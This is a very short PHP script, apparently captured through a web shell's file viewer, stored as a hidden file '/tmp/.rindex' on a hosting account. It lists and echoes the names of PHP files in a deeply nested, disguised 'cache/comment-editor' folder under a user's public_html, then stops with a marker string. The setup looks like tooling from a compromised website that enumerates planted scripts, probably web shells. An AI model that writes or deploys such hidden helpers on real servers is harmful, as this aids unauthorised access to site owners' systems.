Current File : //tmp/.rindex
<?php   foreach (glob("/home/missente/public_html/cache/comment-editor/comment-editor/comment-editor/*.php") as $filename) {     echo "<f>".basename($filename)."</f>"; } die('!ended!');